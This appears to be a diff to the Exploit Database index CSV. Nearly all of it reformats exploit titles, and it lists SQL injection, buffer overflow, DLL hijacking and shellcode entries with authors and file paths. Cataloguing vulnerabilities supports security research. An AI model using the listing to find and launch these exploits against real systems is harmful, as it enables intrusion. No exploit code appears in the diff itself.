-14114,platforms/linux/webapps/14114.txt,"I-net Multi User Email Script SQLi Vulnerability",2010-06-29,"Inj3ct0r Team",linux,webapps,80 14367,platforms/multiple/dos/14367.txt,"Novell Groupwise Webaccess Stack Overflow",2010-07-15,"Francis Provencher",multiple,dos,0 11730,platforms/php/webapps/11730.txt,"Joomla com_nfnaddressbook Remote SQL Injection Vulnerability",2010-03-14,snakespc,php,webapps,0 11731,platforms/php/webapps/11731.html,"RogioBiz PHP Fle Manager 1.2 - Bypass Admin Exploit",2010-03-14,ITSecTeam,php,webapps,0 @@ -10804,7 +10802,7 @@ id,file,description,date,author,platform,type,port 11815,platforms/php/webapps/11815.txt,"joomla component Gift Exchange com_giftexchange 1.0 Beta - (pkg) Remote SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0 11816,platforms/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System BLIND SQL Injection auktion.php (id_auk)",2010-03-20,"Easy Laster",php,webapps,0 11817,platforms/multiple/remote/11817.txt,"KDE <= 4.4.1 Ksysguard RCE via Cross Application Scripting",2010-03-20,emgent,multiple,remote,0 -11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack BOF",2010-03-20,corelanc0d3r,windows,remote,0 +11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack BOF (1)",2010-03-20,corelanc0d3r,windows,remote,0 11822,platforms/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence Managnmnet Hardware[MIPS] 2 - Improper Authentication",2010-03-20,fb1h2s,hardware,remote,0 11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software ttx.cgi Remote File Download",2010-03-20,n01d,cgi,webapps,0 11824,platforms/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack <= 3.0 - ts_other.php SQL Injection Exploit",2010-03-21,"Easy Laster",php,webapps,0 @@ -10853,7 +10851,7 @@ id,file,description,date,author,platform,type,port 11874,platforms/php/webapps/11874.txt,"INVOhost SQL Injection",2010-03-25,"Andrés Gómez",php,webapps,0 11875,platforms/php/webapps/11875.py,"Easy-Clanpage <= 2.01 - SQL Injection Exploit",2010-03-25,"Easy Laster",php,webapps,0 11876,platforms/php/webapps/11876.txt,"justVisual 2.0 (index.php) <= LFI Vulnerability",2010-03-25,eidelweiss,php,webapps,0 -11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack BOF",2010-03-25,sud0,windows,remote,21 +11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack BOF (2)",2010-03-25,sud0,windows,remote,21 11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - DoS",2010-03-25,_SuBz3r0_,windows,dos,69 11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0 11880,platforms/hardware/dos/11880.txt,"Lexmark Multiple Laser printer Remote Stack Overflow",2010-03-25,"Francis Provencher",hardware,dos,0 @@ -10908,7 +10906,7 @@ id,file,description,date,author,platform,type,port 11939,platforms/php/webapps/11939.txt,"Joomla Component com_spec SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0 11940,platforms/php/webapps/11940.txt,"Joomla Component com_television SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0 11941,platforms/php/webapps/11941.txt,"Joomla Component com_items SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0 -11942,platforms/php/webapps/11942.txt,"Joomla Component com_actions SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0 +11942,platforms/php/webapps/11942.txt,"Joomla Component com_actions - SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0 11943,platforms/php/webapps/11943.txt,"React software - Local File Inclusion",2010-03-29,SNK,php,webapps,0 11944,platforms/windows/local/11944.pl,"ASX to MP3 Converter 3.0.0.100 - (.pls) Universal Stack Overflow Exploit",2010-03-28,mat,windows,local,0 11946,platforms/php/webapps/11946.txt,"FaMarket 2 - (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0 @@ -10916,7 +10914,7 @@ id,file,description,date,author,platform,type,port 11948,platforms/php/webapps/11948.txt,"Denapars Shop Script - Multiple Vulnerabilities",2010-03-30,indoushka,php,webapps,0 11949,platforms/php/webapps/11949.txt,"Fa-Ads (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0 11950,platforms/php/webapps/11950.txt,"Fa Home (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0 -11951,platforms/php/webapps/11951.txt,"E-book Store - Multiple Vulnerabilities",2010-03-30,indoushka,php,webapps,0 +11951,platforms/php/webapps/11951.txt,"E-book Store - Multiple Vulnerabilities (1)",2010-03-30,indoushka,php,webapps,0 11953,platforms/windows/local/11953.py,"RM Downloader 3.0.2.1 - (.asx) Local Buffer Overflow (SEH)",2010-03-30,b0telh0,windows,local,0 11954,platforms/php/webapps/11954.txt,"Wazzum Dating Software - Multiple Vulnerabilities",2010-03-30,EL-KAHINA,php,webapps,0 11955,platforms/windows/dos/11955.py,"All to All Audio Convertor 2.0 - Files Stack Overflow PoC",2010-03-30,ITSecTeam,windows,dos,0 @@ -10933,14 +10931,13 @@ id,file,description,date,author,platform,type,port 11968,platforms/php/webapps/11968.txt,"Hosting-php-dynamic (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0 11973,platforms/windows/remote/11973.txt,"CompleteFTP Server Directory Traversal",2010-03-30,zombiefx,windows,remote,0 11974,platforms/windows/remote/11974.py,"HP OpenView NNM - OvWebHelp.exe CGI Topic Overflow",2010-03-30,"S2 Crew",windows,remote,0 -11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - (0day)",2010-03-30,"Richard leahy",windows,dos,0 +11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - (0day) (1)",2010-03-30,"Richard leahy",windows,dos,0 11976,platforms/windows/local/11976.php,"Free MP3 CD Ripper 2.6 - (wav) 1day Stack Buffer Overflow PoC Exploit",2010-03-31,mr_me,windows,local,0 11977,platforms/windows/dos/11977.pl,"CDTrustee .BAK Local Crash PoC",2010-03-31,anonymous,windows,dos,0 11978,platforms/php/webapps/11978.txt,"Joomla Component DW Graph Local File Inclusion",2010-03-31,"Chip d3 bi0s",php,webapps,0 11979,platforms/php/webapps/11979.pl,"Centreon IT & Network Monitoring 2.1.5 - Injection SQL",2010-03-31,"Jonathan Salwan",php,webapps,0 11980,platforms/php/webapps/11980.txt,"Easy-Clanpage <= 2.2 - Multiple SQL Injection + Exploit",2010-03-31,"Easy Laster",php,webapps,0 11981,platforms/windows/local/11981.py,"WM Downloader 3.0.0.9 - (.asx) Local Buffer Overflow",2010-03-31,b0telh0,windows,local,0 -11983,platforms/php/webapps/11983.txt,"Joomla Component com_actions SQL Injection Vulnerability",2010-03-31,"DevilZ TM",php,webapps,0 11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - (.zip) SEH PoC (0day)",2010-03-31,TecR0c,windows,dos,0 11985,platforms/windows/dos/11985.sh,"BitComet <= 1.19 - Remote DoS Exploit",2010-03-31,"Pierre Nogues",windows,dos,0 11986,platforms/linux/remote/11986.py,"OpenDcHub 0.8.1 - Remote Code Execution Exploit",2010-03-31,"Pierre Nogues",linux,remote,0 @@ -11003,7 +11000,7 @@ id,file,description,date,author,platform,type,port 12050,platforms/php/webapps/12050.txt,"MassMirror Uploader - Multiple RFI Exploit",2010-04-04,"cr4wl3r ",php,webapps,0 12051,platforms/windows/local/12051.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow Exploit (0Day)",2010-04-04,"Yakir Wizman",windows,local,0 12052,platforms/php/webapps/12052.txt,"SAGU-PRO 1.0 - Multiple Remote File Include Vulnerability",2010-04-04,mat,php,webapps,0 -12053,platforms/windows/local/12053.py,"ZipCentral (.zip) SEH Exploit",2010-04-04,TecR0c,windows,local,0 +12053,platforms/windows/local/12053.py,"ZipCentral - (.zip) SEH Exploit",2010-04-04,TecR0c,windows,local,0 12054,platforms/php/webapps/12054.txt,"Joomla Component redSHOP - Local File Inclusion Vulnerability",2010-04-04,NoGe,php,webapps,0 12055,platforms/php/webapps/12055.txt,"Joomla Component redTWITTER Local File Inclusion Vulnerability",2010-04-04,NoGe,php,webapps,0 12056,platforms/php/webapps/12056.txt,"Joomla Component WISro Yahoo Quotes Local File Inclusion Vulnerability",2010-04-04,NoGe,php,webapps,0 @@ -11235,7 +11232,7 @@ id,file,description,date,author,platform,type,port 12301,platforms/php/webapps/12301.txt,"CMS Ariadna 2009 SQL Injection",2010-04-19,"Andrés Gómez",php,webapps,0 12302,platforms/windows/dos/12302.html,"HP Operations Manager <= 8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow PoC",2010-04-20,mr_me,windows,dos,0 12303,platforms/php/webapps/12303.pl,"MusicBox 3.3 - SQL Injection Exploit",2010-04-20,Ctacok,php,webapps,0 -12304,platforms/multiple/remote/12304.txt,"MultiThreaded HTTP Server 1.1 - Directory Traversal",2010-04-20,chr1x,multiple,remote,0 +12304,platforms/multiple/remote/12304.txt,"MultiThreaded HTTP Server 1.1 - Directory Traversal (1)",2010-04-20,chr1x,multiple,remote,0 12305,platforms/php/webapps/12305.txt,"Joomla com_jnewspaper (cid) SQL Injection Vulnerability",2010-04-20,"Don Tukulesto",php,webapps,0 12306,platforms/php/webapps/12306.txt,"Joomla Component JTM Reseller 1.9 Beta SQL Injection Vulnerability",2010-04-20,kaMtiEz,php,webapps,0 12308,platforms/windows/remote/12308.txt,"MultiThreaded HTTP Server 1.1 - Source Disclosure",2010-04-20,Dr_IDE,windows,remote,0 @@ -11257,7 +11254,7 @@ id,file,description,date,author,platform,type,port 12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - zgtips.dll Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0 12329,platforms/asp/webapps/12329.txt,"CactuShop - User Invoices Persistent XSS Vulnerability",2010-04-21,7Safe,asp,webapps,0 12330,platforms/php/webapps/12330.txt,"Apache OFBiz - Multiple XSS",2010-04-21,"Lucas Apa",php,webapps,0 -12331,platforms/windows/remote/12331.txt,"MultiThreaded HTTP Server 1.1 - Directory Traversal",2010-04-20,Dr_IDE,windows,remote,0 +12331,platforms/windows/remote/12331.txt,"MultiThreaded HTTP Server 1.1 - Directory Traversal (2)",2010-04-20,Dr_IDE,windows,remote,0 12332,platforms/windows/remote/12332.pl,"Xftp client 3.0 PWD Remote Exploit",2010-04-22,zombiefx,windows,remote,0 12333,platforms/php/webapps/12333.txt,"cms - (id) 5.0 - SQL Injection Vulnerability",2010-04-22,spykit,php,webapps,0 12334,platforms/linux/dos/12334.c,"OpenSSL - Remote DoS",2010-04-22,Andi,linux,dos,0 @@ -11707,7 +11704,7 @@ id,file,description,date,author,platform,type,port 12853,platforms/windows/dos/12853.py,"Quick 'n Easy FTP Server Lite 3.1",2010-06-03,b0nd,windows,dos,0 12855,platforms/php/webapps/12855.txt,"phpBazar 2.1.1 stable - RFI Vulnerability",2010-06-03,Sid3^effects,php,webapps,0 12856,platforms/php/webapps/12856.txt,"osCSS 1.2.1 (REMOTE FILE UPLOAD) Vulnerabilities",2010-06-03,indoushka,php,webapps,0 -12857,platforms/php/webapps/12857.txt,"E-book Store - Multiple Vulnerabilities",2010-06-03,indoushka,php,webapps,0 +12857,platforms/php/webapps/12857.txt,"E-book Store - Multiple Vulnerabilities (2)",2010-06-03,indoushka,php,webapps,0 12858,platforms/php/webapps/12858.txt,"Article Management System 2.1.2 Reinstall Vulnerability",2010-06-03,indoushka,php,webapps,0 12859,platforms/php/webapps/12859.txt,"Advneced Management For Services Sites (File Disclosure) Vulnerabilities",2010-06-03,indoushka,php,webapps,0 12861,platforms/php/webapps/12861.txt,"PHP SETI@home Web monitor - (phpsetimon) RFI / LFI Vulnerability",2010-06-03,eidelweiss,php,webapps,0 @@ -11732,7 +11729,6 @@ id,file,description,date,author,platform,type,port 13256,platforms/bsd_x86/shellcode/13256.c,"bsd/x86 - reverse portbind (129 bytes)",2004-09-26,"Sinan Eren",bsd_x86,shellcode,0 13257,platforms/bsdi_x86/shellcode/13257.txt,"bsdi/x86 - execve /bin/sh (45 bytes)",2004-09-26,duke,bsdi_x86,shellcode,0 13258,platforms/bsdi_x86/shellcode/13258.txt,"bsdi/x86 - execve /bin/sh (46 bytes)",2004-09-26,vade79,bsdi_x86,shellcode,0 -30245,platforms/ios/webapps/30245.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-12,Vulnerability-Lab,ios,webapps,0 30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0 13260,platforms/bsdi_x86/shellcode/13260.c,"bsdi/x86 - execve /bin/sh toupper evasion (97 bytes)",2004-09-26,N/A,bsdi_x86,shellcode,0 13261,platforms/freebsd_x86/shellcode/13261.txt,"FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging",2009-04-13,c0d3_z3r0,freebsd_x86,shellcode,0 @@ -12003,7 +11999,7 @@ id,file,description,date,author,platform,type,port 13525,platforms/win32/shellcode/13525.c,"Windows 9x/NT/2k/XP PEB method 29 bytes",2005-07-26,loco,win32,shellcode,0 13526,platforms/win32/shellcode/13526.c,"Windows 9x/NT/2k/XP PEB method 31 bytes",2005-01-26,twoci,win32,shellcode,0 13527,platforms/win32/shellcode/13527.c,"Windows 9x/NT/2k/XP PEB method 35 bytes",2005-01-09,oc192,win32,shellcode,0 -13528,platforms/win32/shellcode/13528.c,"win xp/2000/2003 Connect Back shellcode for Overflow Exploit 275 bytes",2004-10-25,lion,win32,shellcode,0 +13528,platforms/win32/shellcode/13528.c,"Winows XP/2000/2003 - Connect Back shellcode for Overflow Exploit (275 bytes)",2004-10-25,lion,win32,shellcode,0 13529,platforms/win32/shellcode/13529.c,"win xp/2000/2003 Download File and Exec 241 bytes",2004-10-25,lion,win32,shellcode,0 13530,platforms/win32/shellcode/13530.asm,"windows/XP download and exec source",2004-09-26,"Peter Winter-Smith",win32,shellcode,0 13531,platforms/win32/shellcode/13531.c,"windows/XP-sp1 portshell on port 58821 116 bytes",2004-09-26,silicon,win32,shellcode,0 @@ -12114,7 +12110,7 @@ id,file,description,date,author,platform,type,port 13754,platforms/multiple/webapps/13754.txt,"JForum 2.1.8 bookmarks CSRF & XSS",2010-06-07,"Adam Baldwin",multiple,webapps,0 13756,platforms/windows/local/13756.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit (DEP bypass)",2010-06-07,mr_me,windows,local,0 13760,platforms/windows/local/13760.py,"Audio Converter 8.1 - Stack Buffer Overflow PoC Exploit (0day)",2010-06-07,sud0,windows,local,0 -13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 SEH Buffer Overflow",2010-06-07,chap0,windows,local,0 +13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 - SEH Buffer Overflow",2010-06-07,chap0,windows,local,0 13762,platforms/php/webapps/13762.txt,"CommonSense CMS SQL Injection Vulnerability",2010-06-07,Pokeng,php,webapps,0 13763,platforms/windows/local/13763.pl,"Audio Converter 8.1 - Stack Buffer Overflow PoC Exploit ROP/WPM (0day)",2010-06-07,sud0,windows,local,0 13766,platforms/php/webapps/13766.txt,"Home of MCLogin System - Authentication Bypass",2010-06-08,"L0rd CrusAd3r",php,webapps,0 @@ -12205,7 +12201,7 @@ id,file,description,date,author,platform,type,port 13853,platforms/linux/remote/13853.pl,"Unreal IRCD 3.2.8.1 - Remote Downloader/Execute Trojan",2010-06-13,anonymous,linux,remote,0 13854,platforms/php/webapps/13854.txt,"UTStats - XSS & SQL Injection & Full path disclosure",2010-06-13,"LuM Member",php,webapps,0 13855,platforms/php/webapps/13855.txt,"Eyeland Studio Inc. SQL Injection Vulnerability",2010-06-13,Mr.P3rfekT,php,webapps,0 -13856,platforms/php/webapps/13856.txt,"Yamamah Photo Gallery 1.00 (download.php) Local File Disclosure Vulnerability",2010-06-13,mat,php,webapps,0 +13856,platforms/php/webapps/13856.txt,"Yamamah Photo Gallery 1.00 - (download.php) Local File Disclosure Vulnerability",2010-06-13,mat,php,webapps,0 13857,platforms/php/webapps/13857.txt,"Yamamah Photo Gallery 1.00 SQL Injection Vulnerability (calbums)",2010-06-13,CoBRa_21,php,webapps,0 13858,platforms/php/webapps/13858.txt,"Eyeland Studio Inc. (game.php) SQL Injection Vulnerability",2010-06-13,CoBRa_21,php,webapps,0 13859,platforms/asp/webapps/13859.txt,"Digital Interchange Document Library SQL Injection Vulnerability",2010-06-13,"L0rd CrusAd3r",asp,webapps,0 @@ -12270,7 +12266,7 @@ id,file,description,date,author,platform,type,port 13931,platforms/php/webapps/13931.txt,"Kubelance SQL Injection (profile.php?id)",2010-06-18,"L0rd CrusAd3r",php,webapps,0 13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server <= 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0 13933,platforms/php/webapps/13933.txt,"UK One Media CMS (id) Error Based SQL Injection Vulnerability",2010-06-19,LiquidWorm,php,webapps,0 -13934,platforms/windows/dos/13934.py,"MoreAmp (.maf) Buffer Overflow PoC",2010-06-19,Sid3^effects,windows,dos,0 +13934,platforms/windows/dos/13934.py,"MoreAmp - (.maf) Buffer Overflow PoC",2010-06-19,Sid3^effects,windows,dos,0 13935,platforms/php/webapps/13935.txt,"Joomla Component RSComments 1.0.0 Persistent XSS",2010-06-19,jdc,php,webapps,0 13936,platforms/php/webapps/13936.txt,"Elite Gaming Ladders 3.5 - SQL Injection Vulnerability (ladder[id])",2010-06-19,ahwak2000,php,webapps,0 13937,platforms/php/webapps/13937.txt,"SnowCade 3.0 - SQL Injection Vulnerability",2010-06-19,ahwak2000,php,webapps,0 @@ -12278,7 +12274,7 @@ id,file,description,date,author,platform,type,port 14848,platforms/php/webapps/14848.txt,"Web-Ideas Web Shop Standard SQL Injection Vulnerability",2010-08-31,Ariko-Security,php,webapps,0 13939,platforms/windows/dos/13939.pl,"Hacker Evolution Game: untold Mod Editor 2.00.001 - Buffer Overflow (PoC)",2010-06-19,gunslinger_,windows,dos,0 13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - (.ov) Local Universal Stack Overflow Exploit (SEH)",2010-06-19,Crazy_Hacker,windows,local,0 -13942,platforms/windows/local/13942.pl,"MoreAmp (.maf) Local Stack Buffer Overflow (SEH) (calc)",2010-06-20,Madjix,windows,local,0 +13942,platforms/windows/local/13942.pl,"MoreAmp - (.maf) Local Stack Buffer Overflow (SEH) (calc)",2010-06-20,Madjix,windows,local,0 13943,platforms/lin_x86-64/shellcode/13943.c,"Linux/x86-64 - Add root user with password - 390 bytes",2010-06-20,"Jonathan Salwan",lin_x86-64,shellcode,0 13944,platforms/php/webapps/13944.txt,"SimpleAssets Authentication Bypass & XSS Vulnerability",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13945,platforms/php/webapps/13945.txt,"iBoutique (page) SQL Injection Vulnerability and XSS Vulnerability",2010-06-20,"L0rd CrusAd3r",php,webapps,0 @@ -12402,7 +12398,7 @@ id,file,description,date,author,platform,type,port 14097,platforms/linux/shellcode/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) (30 bytes)",2010-06-28,"Jonathan Salwan",linux,shellcode,0 14091,platforms/osx/remote/14091.py,"UFO: Alien Invasion 2.2.1 - Remote Code Execution (OSX)",2010-06-28,dookie,osx,remote,0 14094,platforms/php/webapps/14094.txt,"Netartmedia iBoutique.MALL SQLi Vulnerability",2010-06-28,Sid3^effects,php,webapps,0 -14095,platforms/php/webapps/14095.txt,"I-net Multi User Email Script SQLi Vulnerability",2010-06-28,Sid3^effects,php,webapps,0 +14095,platforms/php/webapps/14095.txt,"I-net Multi User Email Script - SQLi Vulnerability",2010-06-28,Sid3^effects,php,webapps,0 14096,platforms/php/webapps/14096.html,"CMSQlite & CMySQLite 1.3 - CSRF Vulnerability",2010-06-28,"ADEO Security",php,webapps,0 14295,platforms/windows/dos/14295.html,"Microsoft MSHTML.DLL CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak (0day)",2010-07-09,"Ruben Santamarta ",windows,dos,0 14098,platforms/windows/local/14098.py,"GSM SIM Utility 5.15 - sms file Local SEH BoF",2010-06-28,chap0,windows,local,0 @@ -12638,7 +12634,7 @@ id,file,description,date,author,platform,type,port 14393,platforms/php/webapps/14393.txt,"Calendarix (cal_cat.php) SQL Injection Vulnerability",2010-07-17,SixP4ck3r,php,webapps,0 14394,platforms/php/webapps/14394.txt,"Joomla Component (com_spa) SQL Injection Vulnerability",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0 14395,platforms/php/webapps/14395.txt,"Joomla Component (com_staticxt) SQL Injection Vulnerability",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0 -14397,platforms/windows/local/14397.rb,"MoreAmp SEH Buffer Overflow (Metasploit)",2010-07-17,Madjix,windows,local,0 +14397,platforms/windows/local/14397.rb,"MoreAmp - SEH Buffer Overflow (Metasploit)",2010-07-17,Madjix,windows,local,0 14404,platforms/php/webapps/14404.txt,"Kayako eSupport (functions.php) 3.70.02 - SQL Injection Vulnerability",2010-07-18,ScOrPiOn,php,webapps,0 14405,platforms/php/webapps/14405.txt,"PHP-Fusion Remote Command Execution Vulnerability",2010-07-18,"ViRuS Qalaa",php,webapps,0 14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - MKD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0 @@ -12726,8 +12722,8 @@ id,file,description,date,author,platform,type,port 14501,platforms/php/webapps/14501.txt,"Joomla SimpleShop Component (com_simpleshop) SQL Injection Vulnerability",2010-07-29,"UnD3rGr0unD W4rri0rZ",php,webapps,0 14502,platforms/php/webapps/14502.txt,"Joomla Component (com_beamospetition) SQL Injection Vulnerability",2010-07-29,Forza-Dz,php,webapps,0 14503,platforms/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 - Buffer Overflow Exploit (SEH)",2010-07-29,Madjix,windows,local,0 -14504,platforms/windows/dos/14504.html,"BarCodeWiz BarCode ActiveX 3.29 PoC",2010-07-30,loneferret,windows,dos,0 -14505,platforms/windows/remote/14505.html,"BarCodeWiz Barcode ActiveX Control 3.29 BoF Exploit (SEH)",2010-07-30,loneferret,windows,remote,0 +14504,platforms/windows/dos/14504.html,"BarCodeWiz BarCode ActiveX 3.29 - PoC",2010-07-30,loneferret,windows,dos,0 +14505,platforms/windows/remote/14505.html,"BarCodeWiz Barcode ActiveX Control 3.29 - BoF Exploit (SEH)",2010-07-30,loneferret,windows,remote,0 14511,platforms/windows/dos/14511.pl,"ChordPulse 1.4 - Denial of Service Vulnerability",2010-07-30,Madjix,windows,dos,0 14514,platforms/windows/remote/14514.html,"SigPlus Pro 3.74 - ActiveX LCDWriteString() Remote BoF JIT Spray - aslr/dep bypass",2010-07-31,mr_me,windows,remote,0 14525,platforms/windows/dos/14525.pl,"Jaangle 0.98e.971 - Denial of Service Vulnerability",2010-08-02,s-dz,windows,dos,0 @@ -12932,7 +12928,7 @@ id,file,description,date,author,platform,type,port 14780,platforms/windows/local/14780.c,"Windows Internet Communication Settings DLL Hijacking Exploit (schannel.dll)",2010-08-25,ALPdaemon,windows,local,0 14781,platforms/windows/local/14781.c,"Roxio MyDVD 9 DLL Hijacking Exploit (HomeUtils9.dll)",2010-08-25,storm,windows,local,0 14782,platforms/windows/local/14782.c,"Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll)",2010-08-25,storm,windows,local,0 -14783,platforms/windows/local/14783.c,"Mozilla Thunderbird DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,h4ck3r#47,windows,local,0 +14783,platforms/windows/local/14783.c,"Mozilla Thunderbird - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,h4ck3r#47,windows,local,0 14784,platforms/windows/local/14784.c,"Adobe Extension Manager CS5 5.0.298 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,LiquidWorm,windows,local,0 14785,platforms/windows/local/14785.c,"Adobe ExtendedScript Toolkit CS5 3.5.0.52 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,LiquidWorm,windows,local,0 14786,platforms/windows/local/14786.c,"CorelDRAW X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)",2010-08-25,LiquidWorm,windows,local,0 @@ -13001,7 +12997,7 @@ id,file,description,date,author,platform,type,port 14883,platforms/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial of Service Vulnerability",2010-09-03,"Matthew Bergin",windows,dos,0 14884,platforms/php/webapps/14884.txt,"smbind <= 0.4.7 - SQL Injection Vulnerability",2010-09-03,r00t,php,webapps,0 14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 - ActiveX Remote Exploit (UfPBCtrl.DLL)",2010-11-17,Dr_IDE,windows,remote,0 -14887,platforms/php/webapps/14887.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities",2010-09-04,Abysssec,php,webapps,0 +14887,platforms/php/webapps/14887.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities (1)",2010-09-04,Abysssec,php,webapps,0 14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 (addcomment.php) Persistent XSS Exploit",2010-09-04,"Ptrace Security",php,webapps,0 14891,platforms/php/webapps/14891.txt,"PHP Classifieds ADS (sid) Blind SQL Injection Vulnerability",2010-09-04,"BorN To K!LL",php,webapps,0 14892,platforms/windows/dos/14892.py,"VLC Media Player < 1.1.4 - (.xspf) smb:// URI Handling Remote Stack Overflow PoC",2010-09-04,s-dz,windows,dos,0 @@ -13110,7 +13106,7 @@ id,file,description,date,author,platform,type,port 15044,platforms/asp/webapps/15044.txt,"jmd-cms - Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0 15046,platforms/php/webapps/15046.txt,"Fashione E-Commerce Webshop Multiple SQL Injection Vulnerability",2010-09-19,secret,php,webapps,0 15047,platforms/windows/local/15047.rb,"Audiotran 1.4.2.4 SEH Overflow Exploit (DEP Bypass)",2010-09-19,"Muhamad Fadzil Ramli",windows,local,0 -15048,platforms/windows/remote/15048.txt,"smartermail 7.1.3876 - Directory Traversal Vulnerability",2010-09-19,sqlhacker,windows,remote,0 +15048,platforms/windows/remote/15048.txt,"SmarterMail 7.1.3876 - Directory Traversal Vulnerability",2010-09-19,sqlhacker,windows,remote,0 15049,platforms/php/webapps/15049.txt,"BoutikOne 1.0 - SQL Injection Vulnerability",2010-09-19,BrOx-Dz,php,webapps,0 15050,platforms/php/webapps/15050.txt,"Opencart 1.4.9.1 - Remote File Upload Vulnerability",2010-09-19,Net.Edit0r,php,webapps,0 15100,platforms/win32/webapps/15100.txt,"Joomla Component (com_elite_experts) SQL Injection Vulnerability",2010-09-24,**RoAd_KiLlEr**,win32,webapps,80 @@ -13347,8 +13343,8 @@ id,file,description,date,author,platform,type,port 15338,platforms/php/webapps/15338.txt,"ACC IMoveis 4.0 - SQL Injection Vulnerability",2010-10-27,EraGoN,php,webapps,0 15426,platforms/windows/dos/15426.txt,"Adobe Flash - ActionIf Integer Denial of Service Vulnerability",2010-11-05,"Matthew Bergin",windows,dos,0 15340,platforms/php/webapps/15340.txt,"mycart 2.0 - Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps,0 -15341,platforms/multiple/dos/15341.html,"Firefox Interleaving document.write and appendChild Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0 -15342,platforms/multiple/dos/15342.html,"Firefox Memory Corruption Proof of Concept (Simplified)",2010-10-28,extraexploit,multiple,dos,0 +15341,platforms/multiple/dos/15341.html,"Firefox - Interleaving document.write and appendChild Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0 +15342,platforms/multiple/dos/15342.html,"Firefox - Memory Corruption Proof of Concept (Simplified)",2010-10-28,extraexploit,multiple,dos,0 15343,platforms/php/webapps/15343.php,"RoSPORA <= 1.5.0 - Remote PHP Code Injection",2010-10-28,EgiX,php,webapps,0 15344,platforms/linux/dos/15344.c,"Linux Kernel <= 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite Vulnerability",2010-10-28,"Kees Cook",linux,dos,0 15345,platforms/php/webapps/15345.txt,"TFTgallery <= 0.13.1 - Local File Inclusion Vulnerability",2010-10-28,Havok,php,webapps,0 @@ -13358,7 +13354,7 @@ id,file,description,date,author,platform,type,port 15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Post-Auth Directory Traversal",2010-10-29,chr1x,windows,remote,0 15350,platforms/php/webapps/15350.rb,"PHPKit <= 1.6.1 R2 overview.php SQL Injection Vulnerability Exploit",2010-10-29,"Easy Laster",php,webapps,0 15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System <= 7.5 game.php SQL Injection Exploit",2010-10-29,"Easy Laster",php,webapps,0 -15352,platforms/windows/remote/15352.html,"Firefox 3.6.8 - 3.6.11 Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0 +15352,platforms/windows/remote/15352.html,"Firefox 3.6.8 - 3.6.11 - Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0 15353,platforms/php/webapps/15353.txt,"Joomla Component com_jfuploader < 2.12 - Remote File Upload",2010-10-30,Setr0nix,php,webapps,0 